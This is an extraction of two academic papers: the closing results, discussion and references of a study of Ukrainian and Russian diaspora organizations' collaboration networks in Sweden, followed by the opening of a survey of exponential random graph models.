pro-Ukrainian side, while Russian organizations take both pro-Russian and neutral positions, and organizations that are mixed or do not self-identify with any ethnicity have a lot of heterogeneity. Moreover, the absence of pro-Ukrainian–Russian organizations as well as pro-Russian Ukrainian organizations can also suggest that the conflict’s effect on the organizational network structure and that, at least for some organizations, the conflict in Eastern Ukraine, may have become a focus of activity, or possibly something that partially defines the organizational identity. However, it is impossible to say whether this clustering is statistically meaningful and whether it is due to the data collection, the structure of the network, the node attributes, or the intersection of all three without any statistical inference. The next section aims to test exactly this question. ERGM results I start with the results from the 2014 model, which are presented below (Table 3; Fig. A1). The best fit from all of the three steps performed in the model is shown by step two, which takes into account homophily based on the attitude towards conflict. Interestingly, none of the covariates in the model are significant. The fact that neither the network structure nor nodal attributes of interest are significant, can pinpoint to the lag in creation of organizations that were specifically pro- Russian as in comparison to those which were pro- Ukrainian. In addition, since all the steps are showing very similar AIC values, the geometrically weighted in-degree parameter’s significance and positive value 12 Ukrainian and Russian organizations in Sweden and the conflict back home Table 3. Exponential random graph model for 2014 network. Baseline model Step 2 Step 3 Covariates Estimate SE Estimate SE Estimate SE Edges/intercept −4.92 3.38 −2.34 3.23 −2.48 3.15 Reciprocity 0.58 1.26 0.88 1.21 0.91 1.20 Intransitive −0.41 0.41 −0.26 0.37 −0.25 0.37 gw out-degree −0.93 2.52 −1.72 2.92 −1.68 2.81 gw in-degree (fixed 0.5) 2.66. 1.57 2.22 1.47 2.21 1.47 org. type umbrella organization −0.06 0.57 −0.12 0.46 −0.10 0.46 global independent organization – reference category . . . . . ethnic ident. Ukrainian 1.37 1.00 Russian 0.01 1.21 mixed (Ukrainian and Russian) – reference category . other – – no ethnic ident 0.87 0.99 conflict side pro-Russian pro-Ukrainian neutral – reference category homophily on conflict side –0.51 0.64 on ethnic identification –0.25 0.66 AIC 113 112.2 112.9 Notes: 0 = ***; 0.001 = ** = 0.01; * = 0.05; . = 0.1. in the baseline may give some information about the network. As discussed earlier, late 2013 to early 2014 saw many new organizations being created as a direct response to what was happening in Ukraine. A lot of these organizations aimed to show support or opposition toward the Revolution or, later, the developments in Eastern Ukraine. To be able to have a bigger impact, many of these organizations may have started to connect to other big organizations that were already established before and thus had more “power” in this particular field. This would contribute to the larger popularity (measured by geometrically weighted in-degree) of some actors in the network, showing that the network is centralized on in-degree. On the other hand, some organizations may have been very active in reaching out to many other organizations to make themselves known in this field. Therefore, the analysis of the 2014 network suggests that there is some potential clustering in the network. However, since neither ethnicity nor attitude toward the conflict is significant as well as reflecting that there is no homophily in the collaboration network based on shared attitudes toward the conflict – H1 is supported. For the 2015 network (Table 4; Fig. A2), Step 2 of the models shows the best fit. Both network structure and node attributes matter for the log-odds of a tie between the organizations in 2015. The large negative value on the intercept (term, edges) means that the network is sparse. The “intransitive” term is significant and negative, suggesting the tendency for decreasing number of intransitive triplets. Interestingly, the reciprocity term is now positive and significant. These two terms taken together give indication toward the 13 CONNECTIONS T a b le 4 . E x p o n e n ti a l r a n d o m g ra p h m o d e l f o r 2 0 1 5 n e tw o rk . B a se lin e M o d e l S te p 2 S te p 3 C o va ri a te s E st im a te S E E st im a te S E E st im a te S E E d g es /in te rc ep t − 1 .6 8 ** * 0 .4 4 − 1 .7 7 ** * 0 .4 5 − 1 .7 4 ** * 0 .4 4 re ci p ro ci ty 2 .1 4 ** 0 .8 1 2 .0 7 * 0 .8 2 2 .0 8 ** 0 .8 2 in tr an si tiv e − 0 .2 2 . 0 .1 2 − 0 .2 4 . 0 .1 3 − 0 .2 3 . 0 .1 3 g w in -d eg re e (fi xe d 0 .5 ) 0 .9 7 0 .7 5 1 .0 4 0 .8 1 1 .0 0 0 .7 7 g w o u t- d eg re e (fi xe d 0 .7 ) − 3 .2 2 ** * 0 .5 1 − 3 .1 7 ** * 0 .5 3 − 3 .1 8 ** * 0 .5 3 o rg . ty p e u m b re lla o rg an iz at io n 0 .1 1 0 .1 7 0 .1 2 0 .1 9 0 .0 7 0 .1 9 g lo b al in d ep en d en t o rg an iz at io n – r ef er en ce ca te g o ry . . . . . . et h n ic id en t. U kr ai n ia n R u ss ia n m ix ed (U kr ai n ia n a n d R u ss ia n ) – re fe re n ce c at eg o ry . . . . o th er n o e th n ic id en t. co n fli ct s id e p ro -R u ss ia n − 0 .0 0 1 0 .1 8 p ro -U kr ai n ia n − 0 .0 0 9 0 .1 9 n eu tr al – r ef er en ce c at eg o ry h o m o p h ily co n fli ct s id e p ro -R u ss ia n 0 .0 8 0 .5 1 p ro -U kr ai n ia n 0 .9 0 . 0 .5 3 et h n ic id en t. m ix ed 1 .0 3 0 .5 7 U kr ai n ia n 0 .2 8 0 .4 2 A IC 2 6 9 .7 2 6 7 .2 2 6 8 .1 N o te s: 0 = ** *; 0 .0 0 1 = ** = 0 .0 1 ; * = 0 .0 5 ; . = 0 .1 . 14 Ukrainian and Russian organizations in Sweden and the conflict back home Another significant covariate of the model is the conflict side, where the pro-Russian side has a significant and positive value. This shows that organizations that are pro-Russian tend to have higher log-odds of a tie with any other organization than those that do not take a clear side in the conflict. This may suggest that the significance of sharing a point of view with an organization that other organizations connect to does not have the same meaning anymore. One reason could be that in the year before, the definitions of the sides of support were already established and these organizations that share the same views have already connected; perhaps, it makes more sense to expand the connections, or not, to other organizations no matter what their view. Thus, H3 is supported. Discussion and conclusions The results show that the conflict in Eastern Ukraine may have become a focus of activity for many Ukrainian and Russian organizations active in Sweden. The clustering of the organizations along the conflict attitude lines is shown to be significant, especially during the most violent period of the war (2015). The pro-Ukrainian organizations seem to be more active and show a stronger tendency for homophily, especially in the 2015 network. The results also show that the side of the conflict that an organization takes might be a stronger driver to collaborating with other organizations, thus suggesting that the re-identification of the organization from only based on identification with a certain ethnicity to primarily conflict-oriented took place during the period studied. In other words, it is the attitude toward the conflict that might now define collaboration decisions, and not only the perception of similar “roots and routes.” In addition, early 2014 saw some pro-Ukrainian organizations being created as a response to the Maidan Revolution and most Ukrainians proclaiming their political orientation (mostly pro-revolution) toward it. On the other hand, in late 2014 and 2015, a lot of pro- Russian organizations (six) were created as a response to the openly acknowledged Russian involvement, while the pre-existing Russian organizations claimed mostly neutrality. By late 2014, most of the organizations had a fixed political stance, including neutrality. These pro-Russian organizations rarely claimed to be Russian, and were mostly concerned with spreading the “truth” about the conflict in Eastern Ukraine. This has further driven and changed the field according to the conflict lines and pushed the organizations to collaborate only with those who share the same view on the conflict. More specifically, by difference in the network structure and show that reciprocal connections in 2015 were more likely. The in-degree term is not significant for the network in 2015, as opposed to the out-degree. More precisely, it shows a relatively large negative value. The geometrically weighted out-degree term measures the activity spread; in cases where it is negative, it indicates that the majority of the actors in a network have similar levels of activity and thus, the network is not centralized on out-degree (Lusher et al., 2013). This suggests that in 2015, the organizations that were created in 2013 to 2014 in response to the conflict in Eastern Ukraine were already established within the structure at that point. What is most interesting about Step 2 in the 2015 network model is the significant (at 0.1 level) homophily value on the supported side of the conflict term for pro-Ukrainian organizations, which suggests that pro-Ukrainian organizations tend to have ties with similar (pro-Ukrainian) organizations. While performing the sensitivity analysis, the fit of the model without controlling for ethnic identification was better. However, since the descriptive analysis showed that there is little variation for the Ukrainian organizations in their attitudes toward the conflict, it can be assumed that this model does capture ethnicity. However, Step 3 of the model shows ethnic homophily as non-significant, and does not converge if the control for conflict side attitude is taken out. Thus, it could arguably be understood that the attitude toward the conflict is a more steering parameter than ethnicity. Therefore, H3 is supported by the results from the 2015 network. This was the only model that managed to converge with detailed ethnicity specifications. The model for the 2016 network (Table 5; Fig. A3) shows the best fit in the baseline. Unfortunately, due to technical issues related to the computations in the ERGMs, Steps 2 and 3 in the models for the 2016 network did not converge and thus are not presented here. After performing a sensitivity check, and to avoid multicollinearity, the better fit model in the baseline was the one using conflict side as a control, and not ethnicity. Again, the large negative value on the intercept means that the network is sparse, while geometrically-weighted in-degree being significant and positive indicates that larger organizations might be receiving more connections, and the non-significance of the negative “intransitive” term that controls for the intransitive triplets which all suggest that clustering within the network remains. The geometrically weighted out-degree term is still negative and indicates that most actors have a similar level of activity and that the network does not tend to be centralized on the out-degrees (Lusher et al., 2013). 15 CONNECTIONS 2015, the pro-Ukrainian organizations were more likely to collaborate with other organizations that identified as being pro-Ukrainian. Interestingly though, the pro- Ukrainian organizations were less likely to have ties and thus engage in collaboration by 2016, probably because all the pro-Ukrainian organizations had already collaborated with each other by that point. In addition, after most of the pro-Ukrainian organizations connected with each other, there were none left in the organizational field – and with no new organizations being created, by 2016 the pro-Ukrainian organizations were less likely to collaborate with others in general. On the other hand, the pro-Russian organizations tended to be more likely to collaborate with other organizations in 2016, which is interesting since they were not significantly different from the neutral organizations in 2014 and 2015. One explanation could be that many of the pro-Russian organizations became most active and established in the organizational field in the late 2014 and 2015, and therefore only in 2016 could they accumulate enough collaborations to be somewhat different from the neutral ones. To summarize, the fact that the attitude toward conflict explains tie formation within the collaboration networks for 2015 and 2016 better than ethnicity suggests that conflict in the homeland can become a focus of activity for organizations in a third country, and in this sense rearrange the organizational field. Ethnic homophily probably present before, and based on already established relations and boundaries, loses its clustering potential when a new focus appears as an important factor for activism. This further suggests Table 5. Exponential random graph model for 2016 network (Steps 2 and 3 not converged). Baseline model Covariates Estimate SE Edges/intercept −1.14* 0.50 reciprocity 1.99** 0.65 intransitive −0.01 0.05 gw in-degree 0.81. 0.46 gw out-degree −3.72*** 0.40 org. type umbrella organization −0.16 0.19 independent organization – reference category . . global 0.17 0.19 ethnic ident. Ukrainian Russian mixed (Ukrainian and Russian) – reference category other no ethnic id. conflict side pro-Russian 0.29* 0.13 pro-Ukrainian −0.20 0.26 neutral – reference category . . homophily on conflict side on ethnic ident. AIC 416.7 Notes: 0 = ***; 0.001 = ** = 0.01; * = 0.05; . = 0.1. 16 Ukrainian and Russian organizations in Sweden and the conflict back home that ethnic boundary-making processes are contextual and evolving, not only in relation to the context of the country of residence but also with regard to the political developments in the home country. Similar to Féron (2017), I suggest that conflict may become de-territorialized from its geographical location using similar symbols and ideas; however, thereafter, it can become reshaped within the context of diasporic experiences and finally become autotomized from the original conflict. This can be the case with the Russian and Ukrainian organizations as they seem to have renegotiated collaboration practices from basing them on ethnic identification to verification of the attitude to the conflict of the other organizations. Furthermore, these results may indicate that the meaning of ethnicity for the studied organizations, especially those identifying as Ukrainian, has become intertwined with the perception of the conflict in Eastern Ukraine, and thus incorporating being pro-Ukrainian in a political sense, with the meaning of being Ukrainian within the multiple understandings of defining ethnicity. Finally, although not generalizable, the results found in this study further suggest that armed conflicts can be “imported” or re-territorialized into other contexts and should be accounted for when studying ethnic groups, transnational communities, or diasporas whose “homeland” has been in an ongoing armed conflict. References Address by President of the Russian Federation. Available at: http://en.kremlin.ru/events/president/ news/20603 (accessed March 14, 2019). Baser, B. 2015. Diasporas and homeland conflicts: a comparative perspective, Ashgate Publishing. Blau, P. M. 1977. Inequality and heterogeneity: a primitive theory of social structure, Macmillan Company. Brubaker, R. 2005. The ‘diaspora’ diaspora. Ethnic and Racial Studies 28(1): 1–19, available at: https://doi. org/10.1080/0141987042000289997 Chow, R. and Bowman, P. (Eds) 2010. The Rey Chow reader, Columbia University Press, New York, NY. Coleman, J. 1958. Relational analysis: the study of social organizations with survey methods. Human Organization 17(4): 28–36, available at: https://doi.org/ 10.17730/humo.17.4.q5604m676260q8n7 Conflict in Ukraine . Socio-economic impacts of internal displacement and veteran return – summary report May 2017 (English) | The World Bank. available at: http://documents. worldbank.org /curated /en/571011497962214803/ Conflict-in-Ukraine-socio-economic-impacts-of-internal- displacement-and-veteran-return-summar y-repor t- May-2017 (accessed August 26, 2018). Crash MH17 2014. July 17, available at: www. onder zoeksraad.nl/en/page/3546/crash-mh17-17- july-2014 (accessed January 14, 2019). Davis, J. A. and Leinhardt, S. 1972. The structure of positive interpersonal relations in small groups, in Berger, J. (Ed.), Sociological theories in progress, Vol. 2, Houghton-Mifflin, Boston, MA. Demmers, J. 2002. Diaspora and conflict: locality, long-distance nationalism, and delocalisation of conflict dynamics. Javnost – The Public 9(1): 85–96, available at: https://doi.org/10.1080/13183222.2002.11008795 Eder, D. and Hallinan, M. T. 1978. Sex differences in children’s friendships. American Sociological Review 43(2): 237–50, available at: https://doi.org/10.2307/2094701 Embassy of the Russian Federation in the Kingdom of Sweden. Available at: https://sweden.mid.ru/web/ sweden-en (accessed September 17, 2019). Embassy of Ukraine in the Kingdom of Sweden. Available at: https://sweden.mfa.gov.ua/en (accessed September 17, 2019). European External Action Service website. Available at: https://eeas.europa.eu/delegations/ukraine_en/25291/ EU launches EUR 6 million project to support ‘model police stations’ in 20 Ukrainian districts and new model of public order policing based on Scandinavian approach. Feld, S. L. 1981. The focused organization of social ties. American Journal of Sociology 86(5): 1015–35. Féron, É. 2017. Transporting and re-inventing conflicts: conflict-generated diasporas and conflict autonomisation. Cooperation and Conflict 52(3): 360–76, available at: https://doi.org/10.1177/0010836716671759 Féron, É. and Lefort, B. 2019. Diasporas and conflicts – understanding the nexus. Diaspora Studies 12(1): 34–51, available at: https://doi.org/10.1080/0973 9572.2018.1538687 Fischer, A. and Jasny, L. 2017. Capacity to adapt to environmental change: evidence from a network of organizations concerned with increasing wildfire risk. Ecology and Society 22(1), available at: https://doi. org/10.5751/ES-08867-220123 Ibarra, H. 1992. Homophily and differential returns: sex differences in network structure and access in an advertising firm. Administrative Science Quarterly 37(3): 422–47, available at: https://doi.org/10.2307/2393451 Jabri, V. 2007. Introduction: Understanding War and Violence. In War and The Transformation of Global Politics, Palgrave Macmillan, London, pp. 1–31, available at: https://doi.org/10.1057/9780230626393_1 Koinova, M. 2016. Sustained vs episodic mobilization among conflict-generated diasporas. International Political Science Review 37(4): 500–16, available at: https://doi. org/10.1177/0192512115591641 Lagar för ideell förening – Bolagsverket. Available at: http://bolagsverket.se/fo/foreningsformer/ideell/ lagarideell-1.8132 (accessed August 26, 2018). Lusher, D., Koskinen, J. and Robins, G. 2013. Ex- ponential random graph models for social networks: 17 CONNECTIONS theory, methods, and applications, Cambridge Univer- sity Press. McPherson, J. M. and Smith-Lovin, L. 1987. Homophily in voluntary organizations: status distance and the composition of face-to-face groups. American Sociological Review 52(3): 370–9. McPherson, M., Smith-Lovin, L. and Cook, J. M. 2001. Birds of a feather: homophily in social networks. Annual Review of Sociology 27(1): 415–44, available at: https://doi.org/10.1146/annurev.soc.27.1.415 Marsden, P. V. 1987. Core discussion networks of Americans. American Sociological Review 52(1): 122– 31, available at: https://doi.org/10.2307/2095397 Marsden, P. V. 1988. Homogeneity in confiding relations. Social Networks 10(1): 57–76, available at: https://doi.org/10.1016/0378-8733(88)90010-X Migrationsverket. Available at: www.migrationsverket. se (accessed December 20, 2018). Ministry of Foreign Affairs of Ukraine. Briefings and video comments, available at: https://mfa.gov.ua/en/ press-center/briefing (accessed March 25, 2019). Moliner, C. 2007. Frères ennemis? Relations between Panjabi Sikhs and Muslims in the Diaspora. South Asia Multidisciplinary Academic Journal 1, available at: https://doi.org/10.4000/samaj.135 Morris, M., Handcock, M. S. and Hunter, D. R. 2008. Specification of exponential-family random graph models: terms and computational aspects. Journal of Statistical Software 24(4): 1548–7660. Oberschall, A. 2000. The manipulation of ethnicity: from ethnic cooperation to violence and war in Yugoslavia. Ethnic and Racial Studies 23(6): 982–1001, available at: https://doi.org/10.1080/014198700750018388 Ooka, E. and Wellman, B. 2006. Does social capital pay off more within or between ethnic groups? Analysing job searches in five Toronto ethnic groups, in Fong, E. (Ed.), Inside the Mosaic, University of Toronto Press, Toronto, Buffalo, London, pp. 199–226, available at: www.jstor.org/ stable/10.3138/9781442676176.12 Portes, A., Escobar, C. and Arana, R. 2008. Bridging the gap: transnational and ethnic organizations in the political incorporation of immigrants in the United States. Ethnic and Racial Studies 31(6): 1056–90, available at: https://doi.org/10.1080/01419870701874827 Ragazzi, F. 2012. Diaspora: the politics of its meanings. International Journal of Political Sociology 6(1): 107–11, available at: https://doi.org/10.1111/j.1749- 5687.2011.00152_5.x Riksbank. Available at: www.riksbank.se/en-gb/ (accessed April 2, 2019). Sida: Ukraine. Available at: www.sida.se/English/ where-we-work/Europe/Ukraine-/ (accessed December 14, 2018). Smith, J. A., McPherson, M. and Smith-Lovin, L. 2014. Social distance in the United States: sex, race, religion, age, and education homophily among confidants, 1985 to 2004. American Sociological Review 79(3): 432–56. Statement by the Delegation of the Russian Federation on the situation in Ukraine and the need to implement the Minsk agreements|OSCE. Available at: www.osce.org/ permanent-council/373091 (accessed August 26, 2018). Statistikmyndigheten SCB. Available at: www.scb. se/ (accessed December 27, 2018). UCDP – Uppsala Conflict Data Program. Available at: http://ucdp.uu.se/ (accessed January 14, 2019). UN Documents for Ukraine. Available at: www. securit ycouncilrepor t.org/un-documents/ukraine/ (accessed August 26, 2018). UN Office for the Coordination of Humanitarian Aid (OCHA) 2015 Year in review. Available at: http:// interactive.unocha.org /publication/2015_year_ in _ review/ (accessed March 26, 2019). UN Security Council Meeting on Seized Ukrainian Vessels. Available at: www.un.org/press/en/2018/ sc13601.doc.htm (accessed March 26, 2019). Vertovec, S. 1999. Conceiving and researching trans- nationalism. Ethnic and Racial Studies 22(2): 447–62, available at: https://doi.org/10.1080/014198799329558 Wimmer, A. 2008. Elementary strategies of ethnic boundary making. Ethnic and Racial Studies 31(6): 1025–55, Available at: https://doi.org/10.1080/ 01419870801905612 18 Ukrainian and Russian organizations in Sweden and the conflict back home Figure A1: Goodness-of-fit plot for the best fit model for 2014 network. 2014: Goodness-of-fit diagnostics minimum geodesic distance edge-wise shared partners indegree outdegree Appendix. Goodness-of-fit diagnostics I am presenting goodness-of-fit plots only for the best fit models per year. 19 CONNECTIONS Figure A2: Goodness-of-fit plot for the best fit model for 2015 network. 2015:Goodness-of-fit diagnostics Minimum geodesic distance Edge-wise shared partners In-degree Out-degree 20 Ukrainian and Russian organizations in Sweden and the conflict back home Figure A3: Goodness-of-fit plot for the best fit model for 2016 network. indegree outdegree 2016: Goodness-of-fit diagnostics minimum geodesic distance edge-wise shared partners work_hzbgotiuhjazhgnm4aubvyb7pu ---- Submitted 25 May 2019 Accepted 8 March 2020 Published 6 April 2020 Corresponding author Seyed Hossein Khasteh, khasteh@kntu.ac.ir Academic editor Yilun Shang Additional Information and Declarations can be found on page 23 DOI 10.7717/peerj-cs.269 Copyright 2020 Ghafouri and Khasteh Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A survey on exponential random graph models: an application perspective Saeid Ghafouri and Seyed Hossein Khasteh School of computer engineering, K. N. Toosi University of Technology, Tehran, Iran ABSTRACT The uncertainty underlying real-world phenomena has attracted attention toward statistical analysis approaches. In this regard, many problems can be modeled as networks. Thus, the statistical analysis of networked problems has received special attention from many researchers in recent years. Exponential Random Graph Models, known as ERGMs, are one of the popular statistical methods for analyzing the graphs of networked data. ERGM is a generative statistical network model whose ultimate goal is to present a subset of networks with particular characteristics as a statistical distribution. In the context of ERGMs, these graph’s characteristics are called statistics or configurations. Most of the time they are the number of repeated subgraphs across the graphs. Some examples include the number of triangles or the number of cycle of an arbitrary length. Also, any other census of the graph, as with the edge density, can be considered as one of the graph’s statistics. In this review paper, after explaining the building blocks and classic methods of ERGMs, we have reviewed their newly presented approaches and research papers. Further, we have conducted a comprehensive study on the applications of ERGMs in many research areas which to the best of our knowledge has not been done before. This review paper can be used as an introduction for scientists from various disciplines whose aim is to use ERGMs in some networked data in their field of expertise. Subjects Artificial Intelligence, Computer Networks and Communications, Data Mining and Machine Learning, Network Science and Online Social Networks, Social Computing Keywords Exponential random graph models survey, Exponential random graphs, ERGM, ERGMs’ survey, ERGMs’ applications INTRODUCTION Networks are an essential part of everyday life. From the World Wide Web to biological networks, they all shape the connections of the world. There are many examples of the use of networks in various fields and disciplines. Examples of them include social networks, traffic systems, and disease spread networks. The most canonical way of representing a network is a graph. Indeed, not all of the networks’ ties are presented with 100% certainty. For example, in a friendship network, the level of friendship is not the same among all individuals or there is always a chance that two friends stop their friendship in the future Further, in some domains, the current snapshots of the network depend on its timestamp where the network’s shape might be different if the snapshot has been taken in another time. For example, in a blockchain network, the structure of the network connections is constantly changing. Hence, the graph has a dynamic structure over time. How to cite this article Ghafouri S, Khasteh SH. 2020. A survey on exponential random graph models: an application perspective. PeerJ Comput. Sci. 6:e269 http://doi.org/10.7717/peerj-cs.269 https://peerj.com/computer-science mailto:khasteh@kntu.ac.ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.269 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.269 All of these suggest some level of uncertainty in many real-world networks. Therefore, simple graph theory will not suffice for examining these networks. These limitations have led to proposing completely new statistical approaches for graph analysis. More specifically, we want to build a statistical model based on the observed dataset. In these types of graph analysis, a probability in the interval of [0,1] is assigned to each graph. If this probability is close to zero, it indicates that the graph has no chance of existence, while one suggests that this particular graph will undoubtedly exist in the generated data. Any other value between zero and one indicates the existence probability of that graph. These probabilities have different meanings depending on the domain of the network. However, the probability of graph’s existence is the most fundamental definition, to which we will stick for the rest of the article. Statistical graphs (Frank, 1981; Robins et al., 2007a; Goldenberg et al., 2010) have attracted scientists from different disciplines. There are different kinds of approaches regarding their formulation and learning methods. People from mathematics, computer science, physics, and of course statistics have proposed different algorithms and methods for designing the framework for statistically modeled graphs. In addition, statistical graphs are also fundamental to generative models for generating new graphs with similar statistics and attributes to the original graphs. These artificial generated models have various applications, e.g., data augmentation for learning systems where we have datasets with limited resources or simulating and predicting other possible graphs with similar properties. Furthermore, there are longitudinal (Holland & Leinhardt, 1977; Koskinen & Snijders, 2007; de la Haye et al., 2017; Block et al., 2018) models which aim to observe a network over a time period and predict the network’s future dynamics. Although different approaches exist, in this work, we are going to review research articles about a particular family of statistical graphs known as Exponential Random Graph Models, abbreviated as ERGM. Designing a statistical model consists of three steps: (1) Designing a general formulation based on the context and statistical specification of the dataset; (2) estimating the parameters of the designed model via some learning methods, where sometimes this step is addressed as the phase of fitting the model to the data; and (3) employing the model with learned parameters to predict the future or unseen part of the data, generation of new data with similar properties, or any other possible tasks. The model utilized for ERGMs (step 1) is almost similar across the entire literature. However, the parameter estimation step (step 2) differs case by case. Figure S1 demonstrates the mentioned steps’ flowchart. The focus of the seminal works such as Erdös & Rényi (1959) was mostly on independent tie formation between two nodes. In ERGMs, more complex structures with a reasonable level of dependence have also been taken into account. This approach has led to more complicated models which also require more sophisticated learning methods. Additionally, due to the better accuracy of the models with dependent structures, they are applicable to a more considerable extent of the problems. Therefore, there is a rising interest in using ERGMs in multiple research areas. Previous surveys (Anderson, Wasserman & Crouch, 1999; Pattison & Wasserman, 1999; Robins, Pattison & Wasserman, 1999; Goodreau, 2007; Robins et al., 2007a; Robins et al., Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 2/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269#supp-1 http://dx.doi.org/10.7717/peerj-cs.269 2007b; Fienberg, 2010; Goldenberg et al., 2010; Chatterjee & Diaconis, 2013; Chatterjee, 2016) have introduced most of the articles up to 2016. There have also been two novel surveys in 2018 (Amati, Lomi & Mira, 2018; Van der Pol, 2018) with a focus on the theory and applications of ERGMs. However, there is a relative paucity of studies investigating ERGMs seminal and new methods together. In addition, to the best of our knowledge, no research has been found examining applications of ERGMs in different fields and contexts in the way that we have done. We believe that this review paper can help the scholars of different disciplines to better recognize the recent applications of ERGMs in their specific field of interest. Certainly, here is still room for more applications of ERGMs in other fields which are yet to be discovered. There are also some other generative models for network generation such as the use of the neural network for graph generation (Bojchevski et al., 2018; You et al., 2018) and Stochastic Actor-Oriented Models (Snijders, 1996). However, to the best of our knowledge, ERGMs are one of the oldest methods that have been extensively used in the literature up to now. Several statistical learning methods have been used for ERGMs parameter learning. In this article, we have addressed the following: • Importance sampling • Stochastic approximation • Some of the newly presented methods. We have introduced some applications of random graphs in the following categories: • Medical Imaging • Healthcare applications • Economics and management • Political science • Missing data and link prediction • Scientific collaboration • Wireless networks modelling • Other applications. Also, some useful tools and libraries have been introduced for the estimation of ERGMs: • PNet • R package Statnet • Bergm. ‘Survey Methodology’ is a brief description of the methodology we used to find the articles that we believed are related to the topic of this manuscript. In ‘Precise Definition of ERGMs’ we are going to give a formal definition of ERGMs for the readers who are new to this concept. For experienced researchers in the field, this can be used as a refreshment. Hence, in ‘Methods for Estimation’, most of the state-of-the-art works for ERGMs estimation methods have been discussed. ‘Preliminaries’ is a review of ERGMs’ applications Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 3/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 in multiple fields. In ‘Applications of ERGMs’, we have introduced some of the state-of-the- art new libraries and tools for ERGM estimation. Ultimately, in ‘Conclustion’, we conclude what we had said and also give some ideas for future works in the world of ERGMs. SURVEY METHODOLOGY For the purpose of finding related research articles we used two different approach. 1. Searching related keyword in the google scholar search engine. 2. Starting from an initial pool of articles and then move back and forth between their citations and references. In the first approach we search related keywords like ‘‘ERGM’’, ‘‘Exponential Random Graphs’’, ‘‘Exponential Random Graph Models’’ in the google scholar search engine and extracted related articles by reading their abstracts. In the second approach which was our main methodology throughout the work we initiate with a number of seminal works which were found by one of the following ways. 1. Being introduced by experts in the field. 2. Extracted from the well-known surveys (Anderson, Wasserman & Crouch, 1999; Robins, Pattison & Wasserman, 1999; Pattison & Wasserman, 1999; Goodreau, 2007; Robins et al., 2007a; Robins et al., 2007b; Fienberg, 2010; Goldenberg et al., 2010; Chatterjee & Diaconis, 2013; Chatterjee, 2016; Amati, Lomi & Mira, 2018; vander Pol, 2018) and the well-known book (Lusher, Koskinen & Robins, 2012). 3. Papers extracted from the first approach which had a good citation count or were published in journals with high impact. After finding the initial seed of articles by one of the mentioned methods we checked the related publications that they have referenced and the publications that they have been cited from them. We continued until there were no more related articles. In situations which there were too many related articles our selection criteria were mostly based on the citation count and the journals’ impact factor. PRECISE DEFINITION OF ERGMS In this section, we give a brief overview of the overall ERGM scheme. According to Snijders et al. (2006) and Robins et al. (2007a), the first work that categorized ERGMs as a separate field of study was (Frank & Strauss, 1986). Although it was named as Markov graphs at that time, basically it had the same characteristics. An interested reader can refer to Robins et al. (2007a) and Lusher, Koskinen & Robins (2012) for more details on both the history and mathematical background of this topic. In an ERGM, each graph is associated with a probability. This probability indicates the possibility of the presence of that particular graph in the probability distribution of a class of graphs. There are also two other essential elements in ERGMs known as graph configurations and their corresponding parameter. Each configuration or statistics (we will use both names throughout the text) is composed of some nodes and ties repeated in the graph. For example, a triangle consisting of three nodes and edges can be assumed as a configuration. The authors of the seminal work (Frank & Strauss, 1986) were the first who Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 4/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 Table 1 Notations used throughout this work. Notation Meaning X The set of all possible graphs with the same number of nodes. x The variable that indicates the presence of a particular graph from the distribution. P The probability distribution function of graphs. S The set of all network statistics presented in the model. s Some particular statistics of the network. C The set of all count function of the network configurations. c The count function of some particular statistics of the network. 2 The set of all network statistics coefficients. θ Some particular statistics’ coefficient of the network. N The normalizing factor, the sum of all configurations. argued that these configurations can be considered as sufficient statistics for a log-linear mode. Sufficient statistics are features of a i.i.d dataset which are sufficient for modeling the distribution probability of the data such that adding another feature does not add any more insight to the model (RA Fisher, 1922). So, ERGMs are a representation of the graphs by their configurations. A particular exponential function is defined to represent the relationship between these configurations and the probability distribution of the graphs. This formula is a variation of logistic regression which is extended so that it would handle the dependent variable rather than only being applicable to independent variables which are the case for logistic regression (Lusher, Koskinen & Robins, 2012). We will use the notations presented in Table 1 throughout our work. Note that throughout this work, the representation of the graphs is in the form of the adjacency matrix. For example, in a matrix x if xij =1 it indicates that there is an edge between i and j, while if xij =0 no edge exists between these two nodes. Using the introduced notation of Table 1, the ERGM probability function can be expressed as follows: P(X =x|θ)= 1 N exp { θ1c1(x)+θ2c2(x)+...+θpcp(x) } (1) N is the normalizing factor which is the sum of the probability of all possible graphs computed by Eq. (1), whose formula is as follows: N = ∑ x∈X exp { θ1c1(x)+θ2c2(x)+...+θpcp(x) } (2) If we summarize the results, this leads to: P(X =x|θ)= 1 N exp { θ T C(x) } (3) N = ∑ x∈X expθT C(x) (4) Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 5/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 It can be seen in the Eq. (3) that the network configurations are the building blocks of the ERGM formulation. Choosing the correct configurations with the right relation to the network context is central for to the correct estimation of the graphs’ distribution. There are two types of network statistics: (1) statistics based on the edge formations, (2) statistics that are based on the node attributes. In the rest of this section, we are going to introduce some basic network configurations (Snijders et al., 2006; Robins et al., 2007a) which have been used in the literature. Structural configuration refers to the statistics that depend solely on the structure of the graph. Note that their usage is not dependent on the network context and can be applied to any networks. These structures are different in undirected and directed networks. Some structural configurations that are widely used for undirected and directed graphs are presented in (Tables S1 and S2), respectively. Although use of nodal configurations in our model will cause to be more dependent on some specific context, sometimes it is still useful to leverage this kind of network attributes. The reason is that, in many networks, there is a treasure of useful features in the node’s metadata and it is not wise to ignore them as one of our model features. Some descriptions of nodal configurations that are widely used for undirected and directed graphs are reported in (Tables S4 and S5), respectively. According to Morris, Handcock & Hunter (2008), there should not be a linear dependence between the configurations that are used in a model. It is due to that fact that the configurations with linear interdependence with each other cannot add any new benefit to the model and only make the model more complicated. Snijders et al. (2006) gave a generalization of ERGMs and also introduced some new configurations. Since then, it has been extensively used in other works. Here we present a brief description of each of them. Geometrically Weighted Degree Counts (GWDC): this measure is an extension of the nodes’ degree combined with geometrically degree discounts in the computation of the statistics, which is expressed as the following expression: GWDC(x)= n−1∑ k=0 